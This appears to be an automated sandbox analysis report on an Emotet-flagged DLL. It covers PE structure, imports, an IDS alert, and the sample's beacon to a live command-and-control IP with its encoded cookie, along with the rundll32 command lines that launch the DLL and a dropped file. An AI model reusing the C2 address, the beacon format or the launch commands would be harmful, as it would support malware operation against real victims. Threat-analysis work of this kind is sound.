
                                                                                                                                                                          Rich Headers

                                                                                                                                                                          Programming Language:
                                                                                                                                                                          • [ C ] VS2008 build 21022
                                                                                                                                                                          • [LNK] VS2008 build 21022
                                                                                                                                                                          • [ C ] VS2005 build 50727
                                                                                                                                                                          • [ASM] VS2008 build 21022
                                                                                                                                                                          • [IMP] VS2005 build 50727
                                                                                                                                                                          • [RES] VS2008 build 21022
                                                                                                                                                                          • [EXP] VS2008 build 21022
                                                                                                                                                                          • [C++] VS2008 build 21022

                                                                                                                                                                          Data Directories

                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x6be100x4e.rdata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x6996c0xf0.rdata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x970000x7160.rsrc
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x9f0000x6ea0.reloc
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x611800x40.rdata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x560000x708.rdata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x698bc0x40.rdata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                          Sections

                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                          .text0x10000x5487c0x54a00False0.557670559453data6.55778526171IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                          .rdata0x560000x15e5e0x16000False0.312444513494data5.09323776174IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                          .data0x6c0000x2a3940x26800False0.943314985795data7.9074320255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                          .rsrc0x970000x71600x7200False0.260450932018data3.9170647287IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                          .reloc0x9f0000xab2e0xac00False0.364280523256data5.0366284188IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                          Resources

                                                                                                                                                                          NameRVASizeTypeLanguageCountry
                                                                                                                                                                          RT_CURSOR0x980c00x134dataEnglishUnited States
                                                                                                                                                                          RT_CURSOR0x981f40xb4dataEnglishUnited States
                                                                                                                                                                          RT_CURSOR0x982a80x134AmigaOS bitmap fontEnglishUnited States
                                                                                                                                                                          RT_CURSOR0x983dc0x134dataEnglishUnited States
                                                                                                                                                                          RT_CURSOR0x985100x134dataEnglishUnited States
                                                                                                                                                                          RT_CURSOR0x986440x134dataEnglishUnited States
                                                                                                                                                                          RT_CURSOR0x987780x134dataEnglishUnited States
                                                                                                                                                                          RT_CURSOR0x988ac0x134dataEnglishUnited States
                                                                                                                                                                          RT_CURSOR0x989e00x134dataEnglishUnited States
                                                                                                                                                                          RT_CURSOR0x98b140x134dataEnglishUnited States
                                                                                                                                                                          RT_CURSOR0x98c480x134dataEnglishUnited States
                                                                                                                                                                          RT_CURSOR0x98d7c0x134dataEnglishUnited States
                                                                                                                                                                          RT_CURSOR0x98eb00x134AmigaOS bitmap fontEnglishUnited States
                                                                                                                                                                          RT_CURSOR0x98fe40x134dataEnglishUnited States
                                                                                                                                                                          RT_CURSOR0x991180x134dataEnglishUnited States
                                                                                                                                                                          RT_CURSOR0x9924c0x134dataEnglishUnited States
                                                                                                                                                                          RT_CURSOR0x993800x134dataEnglishUnited States
                                                                                                                                                                          RT_CURSOR0x994b40xb4dataEnglishUnited States
                                                                                                                                                                          RT_BITMAP0x995680x428dataEnglishUnited States
                                                                                                                                                                          RT_BITMAP0x999900x8d8dataEnglishUnited States
                                                                                                                                                                          RT_BITMAP0x9a2680xb8dataEnglishUnited States
                                                                                                                                                                          RT_BITMAP0x9a3200x144dataEnglishUnited States
                                                                                                                                                                          RT_MENU0x9a4640x35edataEnglishUnited States
                                                                                                                                                                          RT_MENU0x9a7c40x2adataEnglishUnited States
                                                                                                                                                                          RT_DIALOG0x9a7f00xe8dataEnglishUnited States
                                                                                                                                                                          RT_DIALOG0x9a8d80x1a2dataEnglishUnited States
                                                                                                                                                                          RT_DIALOG0x9aa7c0x15adataEnglishUnited States
                                                                                                                                                                          RT_DIALOG0x9abd80x34dataEnglishUnited States
                                                                                                                                                                          RT_STRING0x9ac0c0x72dataEnglishUnited States
                                                                                                                                                                          RT_STRING0x9ac800xeedataEnglishUnited States
                                                                                                                                                                          RT_STRING0x9ad700x30dataEnglishUnited States
                                                                                                                                                                          RT_STRING0x9ada00x23edataEnglishUnited States
                                                                                                                                                                          RT_STRING0x9afe00x280dataEnglishUnited States
                                                                                                                                                                          RT_STRING0x9b2600x244dataEnglishUnited States
                                                                                                                                                                          RT_STRING0x9b4a40x1aadataEnglishUnited States
                                                                                                                                                                          RT_STRING0x9b6500xbadataEnglishUnited States
                                                                                                                                                                          RT_STRING0x9b70c0x92dataEnglishUnited States
                                                                                                                                                                          RT_STRING0x9b7a00x3adataEnglishUnited States
                                                                                                                                                                          RT_STRING0x9b7dc0x296dataEnglishUnited States
                                                                                                                                                                          RT_STRING0x9ba740x260dataEnglishUnited States
                                                                                                                                                                          RT_STRING0x9bcd40x328dataEnglishUnited States
                                                                                                                                                                          RT_STRING0x9bffc0x70dataEnglishUnited States
                                                                                                                                                                          RT_STRING0x9c06c0x106dataEnglishUnited States
                                                                                                                                                                          RT_STRING0x9c1740xdadataEnglishUnited States
                                                                                                                                                                          RT_STRING0x9c2500x46dataEnglishUnited States
                                                                                                                                                                          RT_STRING0x9c2980xc6dataEnglishUnited States
                                                                                                                                                                          RT_STRING0x9c3600x1f8dataEnglishUnited States
                                                                                                                                                                          RT_STRING0x9c5580x86dataEnglishUnited States
                                                                                                                                                                          RT_STRING0x9c5e00xd0dataEnglishUnited States
                                                                                                                                                                          RT_STRING0x9c6b00x2adataEnglishUnited States
                                                                                                                                                                          RT_STRING0x9c6dc0x184dataEnglishUnited States
                                                                                                                                                                          RT_STRING0x9c8600x124dataEnglishUnited States
                                                                                                                                                                          RT_STRING0x9c9840x4e6dataEnglishUnited States
                                                                                                                                                                          RT_STRING0x9ce6c0x264dataEnglishUnited States
                                                                                                                                                                          RT_STRING0x9d0d00x2dadataEnglishUnited States
                                                                                                                                                                          RT_STRING0x9d3ac0x8adataEnglishUnited States
                                                                                                                                                                          RT_STRING0x9d4380xacdataEnglishUnited States
                                                                                                                                                                          RT_STRING0x9d4e40xdedataEnglishUnited States
                                                                                                                                                                          RT_STRING0x9d5c40x4a8dataEnglishUnited States
                                                                                                                                                                          RT_STRING0x9da6c0x228dataEnglishUnited States
                                                                                                                                                                          RT_STRING0x9dc940x2cdataEnglishUnited States
                                                                                                                                                                          RT_STRING0x9dcc00x42dataEnglishUnited States
                                                                                                                                                                          RT_ACCELERATOR0x9dd040x80dataEnglishUnited States
                                                                                                                                                                          RT_ACCELERATOR0x9dd840x18dataEnglishUnited States
                                                                                                                                                                          RT_GROUP_CURSOR0x9dd9c0x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                                                                                          RT_GROUP_CURSOR0x9ddc00x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                                                                                          RT_GROUP_CURSOR0x9dde40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                                                                          RT_GROUP_CURSOR0x9ddf80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                                                                          RT_GROUP_CURSOR0x9de0c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                                                                          RT_GROUP_CURSOR0x9de200x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                                                                          RT_GROUP_CURSOR0x9de340x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                                                                          RT_GROUP_CURSOR0x9de480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                                                                          RT_GROUP_CURSOR0x9de5c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                                                                          RT_GROUP_CURSOR0x9de700x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                                                                          RT_GROUP_CURSOR0x9de840x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                                                                          RT_GROUP_CURSOR0x9de980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                                                                          RT_GROUP_CURSOR0x9deac0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                                                                          RT_GROUP_CURSOR0x9dec00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                                                                          RT_GROUP_CURSOR0x9ded40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                                                                          RT_GROUP_CURSOR0x9dee80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                                                                          RT_MANIFEST0x9defc0x15aASCII text, with CRLF line terminatorsEnglishUnited States
                                                                                                                                                                          None0x9e0580xaadataEnglishUnited States
                                                                                                                                                                          None0x9e1040x1edataEnglishUnited States
                                                                                                                                                                          None0x9e1240x3adataEnglishUnited States

                                                                                                                                                                          Imports

                                                                                                                                                                          DLLImport
                                                                                                                                                                          KERNEL32.dllSleep, HeapSize, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, HeapDestroy, VirtualFree, GetStdHandle, GetACP, IsValidCodePage, SetHandleCount, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, InitializeCriticalSectionAndSpinCount, GetStringTypeA, GetStringTypeW, GetTimeZoneInformation, GetConsoleCP, GetConsoleMode, LCMapStringA, LCMapStringW, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CompareStringW, SetEnvironmentVariableA, RaiseException, RtlUnwind, HeapReAlloc, GetCommandLineA, VirtualQuery, GetSystemInfo, VirtualAlloc, VirtualProtect, HeapAlloc, HeapFree, GetTickCount, GetCurrentDirectoryA, GetFileSizeEx, LocalFileTimeToFileTime, FileTimeToLocalFileTime, CreateFileA, GetShortPathNameA, GetVolumeInformationA, FindFirstFileA, FindClose, GetCurrentProcess, DuplicateHandle, GetFileSize, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, GetStringTypeExA, DeleteFileA, MoveFileA, GetOEMCP, GetCPInfo, InterlockedIncrement, GetModuleHandleW, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, GlobalHandle, GlobalReAlloc, TlsGetValue, SystemTimeToFileTime, FileTimeToSystemTime, GetThreadLocale, GlobalFlags, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSection, lstrcmpiA, LocalAlloc, LocalLock, LocalUnlock, InterlockedDecrement, GetPrivateProfileStringA, WritePrivateProfileStringA, GetPrivateProfileIntA, GetCurrentThread, ConvertDefaultLocale, EnumResourceLanguagesA, GetLocaleInfoA, InterlockedExchange, lstrcmpA, GetDiskFreeSpaceA, GetFullPathNameA, GetTempFileNameA, GetFileTime, SetFileTime, GetFileAttributesA, CloseHandle, FreeResource, GetCurrentThreadId, GlobalGetAtomNameA, GlobalAddAtomA, GlobalFindAtomA, GlobalDeleteAtom, FreeLibrary, CompareStringA, lstrcmpW, GetVersionExA, GlobalFree, GlobalAlloc, FormatMessageA, LocalFree, GlobalLock, GlobalUnlock, GetModuleHandleA, GetProcAddress, GetCurrentProcessId, GetModuleFileNameA, SetLastError, LoadLibraryA, lstrlenA, ExitProcess, LockResource, GetLastError, lstrlenW, MultiByteToWideChar, SizeofResource, WideCharToMultiByte, LoadResource, FindResourceA, GetSystemTimeAsFileTime, MulDiv
                                                                                                                                                                          USER32.dllRegisterClipboardFormatA, PostThreadMessageA, MessageBeep, IsClipboardFormatAvailable, UnpackDDElParam, ReuseDDElParam, LoadMenuA, LoadAcceleratorsA, InsertMenuItemA, BringWindowToTop, TranslateAcceleratorA, IsZoomed, SetParent, GetSystemMenu, DeleteMenu, DestroyMenu, GetMenuItemInfoA, InflateRect, ReleaseCapture, LoadCursorA, SetCapture, SetWindowRgn, DrawIcon, IsRectEmpty, SetWindowContextHelpId, MapDialogRect, ShowOwnedPopups, SetCursor, PostQuitMessage, GetMessageA, TranslateMessage, ValidateRect, GetDesktopWindow, GetActiveWindow, CreateDialogIndirectParamA, GetNextDlgTabItem, EndDialog, SetRectEmpty, GetCursorPos, WindowFromPoint, KillTimer, SetTimer, InvalidateRect, SetRect, ShowWindow, IsDialogMessageA, SetDlgItemTextA, RegisterWindowMessageA, LoadIconA, SendDlgItemMessageA, WinHelpA, IsChild, LockWindowUpdate, SetWindowsHookExA, CallNextHookEx, GetClassLongA, GetClassNameA, SetPropA, GetPropA, RemovePropA, SetFocus, GetWindowTextLengthA, GetWindowTextA, GetForegroundWindow, SetActiveWindow, DispatchMessageA, BeginDeferWindowPos, EndDeferWindowPos, GetDlgItem, GetTopWindow, DestroyWindow, UnhookWindowsHookEx, GetMessageTime, GetMessagePos, PeekMessageA, MapWindowPoints, ScrollWindow, TrackPopupMenu, GetKeyState, SetMenu, SetScrollRange, GetScrollRange, SetScrollPos, GetScrollPos, SetForegroundWindow, ShowScrollBar, IsWindowVisible, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, AdjustWindowRectEx, EqualRect, DeferWindowPos, GetScrollInfo, EnableWindow, GetDC, SendMessageA, IsWindow, GetClientRect, SetScrollInfo, CopyRect, PtInRect, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, GetMenu, SetWindowLongA, OffsetRect, IntersectRect, SystemParametersInfoA, IsIconic, GetWindowPlacement, GetWindowRect, GetSystemMetrics, GetWindow, GetDCEx, GetNextDlgGroupItem, DestroyIcon, CharUpperA, CharNextA, InvalidateRgn, CopyAcceleratorTableA, GetSysColorBrush, GetCapture, GetTabbedTextExtentA, UpdateWindow, SetWindowTextA, PostMessageA, GetMenuItemCount, AppendMenuA, CreatePopupMenu, SetWindowPos, EnableMenuItem, MessageBoxA, GetSubMenu, GetMenuItemID, CheckMenuItem, GetMenuState, ModifyMenuA, GetParent, GetFocus, LoadBitmapA, GetMenuCheckMarkDimensions, SetMenuItemBitmaps, IsWindowEnabled, GetLastActivePopup, GetWindowLongA, GetWindowThreadProcessId, FillRect, TabbedTextOutA, DrawTextA, DrawTextExA, GrayStringA, ScreenToClient, ClientToScreen, ReleaseDC, GetWindowDC, BeginPaint, EndPaint, GetSysColor, InsertMenuA, GetMenuStringA, MoveWindow
                                                                                                                                                                          GDI32.dllCreateCompatibleDC, CreateSolidBrush, CreateDCA, GetBkColor, GetCharWidthA, StretchDIBits, CreateCompatibleBitmap, CreateEllipticRgn, CreatePatternBrush, LPtoDP, Ellipse, CreateFontIndirectA, GetTextExtentPoint32A, GetTextMetricsA, CreateRectRgnIndirect, SetRectRgn, CombineRgn, GetMapMode, PatBlt, GetRgnBox, GetTextColor, StartPage, EndPage, SetAbortProc, AbortDoc, EndDoc, DeleteDC, ExtSelectClipRgn, ScaleWindowExtEx, SetWindowExtEx, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, SetViewportOrgEx, SelectObject, DPtoLP, GetStockObject, ExtTextOutA, TextOutA, RectVisible, PtVisible, StartDocA, GetPixel, BitBlt, GetWindowExtEx, GetViewportExtEx, GetObjectA, CreateRectRgn, SelectClipRgn, DeleteObject, IntersectClipRect, ExcludeClipRect, GetClipBox, SetMapMode, SetTextColor, SetBkMode, SetBkColor, RestoreDC, SaveDC, CreateBitmap, EnumFontFamiliesA, CreateFontA, GetDeviceCaps, Escape
                                                                                                                                                                          COMDLG32.dllGetFileTitleA
                                                                                                                                                                          WINSPOOL.DRVGetJobA, DocumentPropertiesA, ClosePrinter, OpenPrinterA
                                                                                                                                                                          ADVAPI32.dllRegDeleteValueA, RegSetValueExA, RegCreateKeyExA, RegQueryValueA, RegOpenKeyA, RegEnumKeyA, RegDeleteKeyA, RegQueryValueExA, GetFileSecurityA, SetFileSecurityA, RegSetValueA, IsTextUnicode, RegCloseKey, RegEnumValueA, RegOpenKeyExA, RegCreateKeyA
                                                                                                                                                                          SHELL32.dllDragFinish, SHGetFileInfoA, ExtractIconA, DragQueryFileA
                                                                                                                                                                          SHLWAPI.dllPathFindFileNameA, PathStripToRootA, PathIsUNCA, PathFindExtensionA, PathRemoveFileSpecW
                                                                                                                                                                          oledlg.dll
                                                                                                                                                                          ole32.dllOleInitialize, CoFreeUnusedLibraries, OleUninitialize, CoInitializeEx, CoUninitialize, CreateILockBytesOnHGlobal, StgCreateDocfileOnILockBytes, StgOpenStorageOnILockBytes, CoGetClassObject, CoCreateInstance, CoRevokeClassObject, CLSIDFromProgID, CoTaskMemAlloc, CoTaskMemFree, OleIsCurrentClipboard, OleFlushClipboard, CoRegisterMessageFilter, CLSIDFromString
                                                                                                                                                                          OLEAUT32.dllSysAllocStringLen, SysAllocString, SafeArrayGetLBound, VariantClear, VariantInit, SafeArrayGetElement, SysFreeString, SafeArrayGetUBound, SysStringLen, SysAllocStringByteLen, VariantChangeType, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetElemsize, SafeArrayGetDim, SafeArrayCreate, VariantCopy, SafeArrayDestroy, VariantTimeToSystemTime, SystemTimeToVariantTime, OleCreateFontIndirect

                                                                                                                                                                          Exports

                                                                                                                                                                          NameOrdinalAddress
                                                                                                                                                                          Control_RunDLL10x10005d60

                                                                                                                                                                          Possible Origin

                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                          EnglishUnited States

                                                                                                                                                                          Network Behavior

                                                                                                                                                                          Snort IDS Alerts

                                                                                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                          11/25/21-14:06:01.795636TCP2404336ET CNC Feodo Tracker Reported CnC Server TCP group 1949764443192.168.2.451.178.61.60

                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                          TCP Packets

                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                          Nov 25, 2021 14:19:06.641235113 CET49759443192.168.2.551.178.61.60
                                                                                                                                                                          Nov 25, 2021 14:19:06.641295910 CET4434975951.178.61.60192.168.2.5
                                                                                                                                                                          Nov 25, 2021 14:19:06.641371965 CET49759443192.168.2.551.178.61.60
                                                                                                                                                                          Nov 25, 2021 14:19:06.679991007 CET49759443192.168.2.551.178.61.60
                                                                                                                                                                          Nov 25, 2021 14:19:06.680025101 CET4434975951.178.61.60192.168.2.5
                                                                                                                                                                          Nov 25, 2021 14:19:06.798898935 CET4434975951.178.61.60192.168.2.5
                                                                                                                                                                          Nov 25, 2021 14:19:06.799096107 CET49759443192.168.2.551.178.61.60
                                                                                                                                                                          Nov 25, 2021 14:19:07.074810028 CET49759443192.168.2.551.178.61.60
                                                                                                                                                                          Nov 25, 2021 14:19:07.074851990 CET4434975951.178.61.60192.168.2.5
                                                                                                                                                                          Nov 25, 2021 14:19:07.075124025 CET4434975951.178.61.60192.168.2.5
                                                                                                                                                                          Nov 25, 2021 14:19:07.075217009 CET49759443192.168.2.551.178.61.60
                                                                                                                                                                          Nov 25, 2021 14:19:07.081238985 CET49759443192.168.2.551.178.61.60
                                                                                                                                                                          Nov 25, 2021 14:19:07.128875971 CET4434975951.178.61.60192.168.2.5
                                                                                                                                                                          Nov 25, 2021 14:19:07.363884926 CET4434975951.178.61.60192.168.2.5
                                                                                                                                                                          Nov 25, 2021 14:19:07.363960981 CET4434975951.178.61.60192.168.2.5
                                                                                                                                                                          Nov 25, 2021 14:19:07.363982916 CET49759443192.168.2.551.178.61.60
                                                                                                                                                                          Nov 25, 2021 14:19:07.364016056 CET49759443192.168.2.551.178.61.60
                                                                                                                                                                          Nov 25, 2021 14:19:07.365650892 CET49759443192.168.2.551.178.61.60
                                                                                                                                                                          Nov 25, 2021 14:19:07.365680933 CET4434975951.178.61.60192.168.2.5

                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                          • 51.178.61.60

                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          0192.168.2.54975951.178.61.60443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          2021-11-25 13:19:07 UTC0OUTGET /mORDXFCTowJiEI HTTP/1.1
                                                                                                                                                                          Cookie: komdJdlT=TUmhOHjsq0jpdGYwwvuYW84t0VBz8jE3ieyufpTPSdsSjuFT9qN1vMRROT8XX34gAF8S6dpwUc+oH5xz0lXr75zGC35p3jlBRFBy5IujQdhnOqTtUqxCGNYrbZrmR2afdnZt5Wh/ofDgB2jcFQw6+VQQ2JIP7HCr+Pn9kzeVvkTqaBMsd4PXWCuDfSYazrGRqNltBGE0OeF7XD2oZRFmR54nZGCBwDANUxBVGwEA6yHtFefhr4En4Q==
                                                                                                                                                                          Host: 51.178.61.60
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          2021-11-25 13:19:07 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Thu, 25 Nov 2021 13:19:07 GMT
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          2021-11-25 13:19:07 UTC0INData Raw: 33 33 66 0d 0a 7f 9e 22 f7 6b 8c 6d 2e c4 cc f6 86 17 12 51 73 0e 04 ad 39 d5 15 b8 7b 9b 2a a1 d5 c3 99 51 d4 48 2d e0 2b 9c 72 df 7f 51 61 9e e8 b2 9f d2 be ed 64 22 bc 3a 1c 36 76 60 20 e2 ca 2b d5 72 68 bf f2 23 1b 61 b2 03 a9 b2 a6 5f 75 d0 26 a7 99 5e 2f 77 54 58 a4 1c 84 d1 26 8b 3b 99 32 4f 2b 8b 54 ca 0e 45 6b a4 36 34 ab 00 c1 a8 15 62 35 d0 60 32 e2 9a dd 2f 95 28 e0 b7 2c fc df 44 32 2f ea 09 3c b4 e6 da 20 22 16 d3 cb 9d 43 4f d1 e4 e0 f2 e1 e5 82 82 b4 c5 53 1e 6e 19 e2 5b ac b4 0d b5 43 b1 0e 23 17 d7 28 60 f5 84 2f 55 5f 4c 32 3a a2 32 c4 50 91 ba 99 f4 46 ca 1e 29 a0 e7 23 25 86 df b5 01 12 8b 92 5f c9 e4 a7 f7 20 a5 75 7f a6 4a 2f 8b 2e 79 15 ec 80 26 ea fe be 52 16 8b b2 ec 0f 3b 2f 48 a7 aa 30 9d f9 64 d2 ee 11 31 e1 73 1c 8a 9a c9 71
                                                                                                                                                                          Data Ascii: 33f"km.Qs9{*QH-+rQad":6v` +rh#a_u&^/wTX&;2O+TEk64b5`2/(,D2/< "COSn[C#(`/U_L2:2PF)#%_ uJ/.y&R;/H0d1sq


                                                                                                                                                                          Code Manipulations

                                                                                                                                                                          Statistics

                                                                                                                                                                          Behavior

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          System Behavior

                                                                                                                                                                          General

                                                                                                                                                                          Start time:14:18:54
                                                                                                                                                                          Start date:25/11/2021
                                                                                                                                                                          Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:loaddll32.exe "C:\Users\user\Desktop\MakbLShaqA.dll"
                                                                                                                                                                          Imagebase:0x1260000
                                                                                                                                                                          File size:893440 bytes
                                                                                                                                                                          MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high

                                                                                                                                                                          General

                                                                                                                                                                          Start time:14:18:55
                                                                                                                                                                          Start date:25/11/2021
                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\MakbLShaqA.dll",#1
                                                                                                                                                                          Imagebase:0x150000
                                                                                                                                                                          File size:232960 bytes
                                                                                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high

                                                                                                                                                                          General

                                                                                                                                                                          Start time:14:18:55
                                                                                                                                                                          Start date:25/11/2021
                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\MakbLShaqA.dll,Control_RunDLL
                                                                                                                                                                          Imagebase:0x2a0000
                                                                                                                                                                          File size:61952 bytes
                                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.251093887.0000000005030000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.250243016.0000000002DE0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.250730251.0000000004BC0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.250606997.0000000004AE0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.251012589.0000000004EC0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.250937948.0000000004E60000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          Reputation:high

                                                                                                                                                                          General

                                                                                                                                                                          Start time:14:18:56
                                                                                                                                                                          Start date:25/11/2021
                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\MakbLShaqA.dll",#1
                                                                                                                                                                          Imagebase:0x2a0000
                                                                                                                                                                          File size:61952 bytes
                                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.248189238.00000000028A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          Reputation:high

                                                                                                                                                                          General

                                                                                                                                                                          Start time:14:18:56
                                                                                                                                                                          Start date:25/11/2021
                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\MakbLShaqA.dll",Control_RunDLL
                                                                                                                                                                          Imagebase:0x2a0000
                                                                                                                                                                          File size:61952 bytes
                                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high

                                                                                                                                                                          General

                                                                                                                                                                          Start time:14:18:57
                                                                                                                                                                          Start date:25/11/2021
                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Sxdbowjvh\qaursesh.cky",UWJouFROYqkt
                                                                                                                                                                          Imagebase:0x2a0000
                                                                                                                                                                          File size:61952 bytes
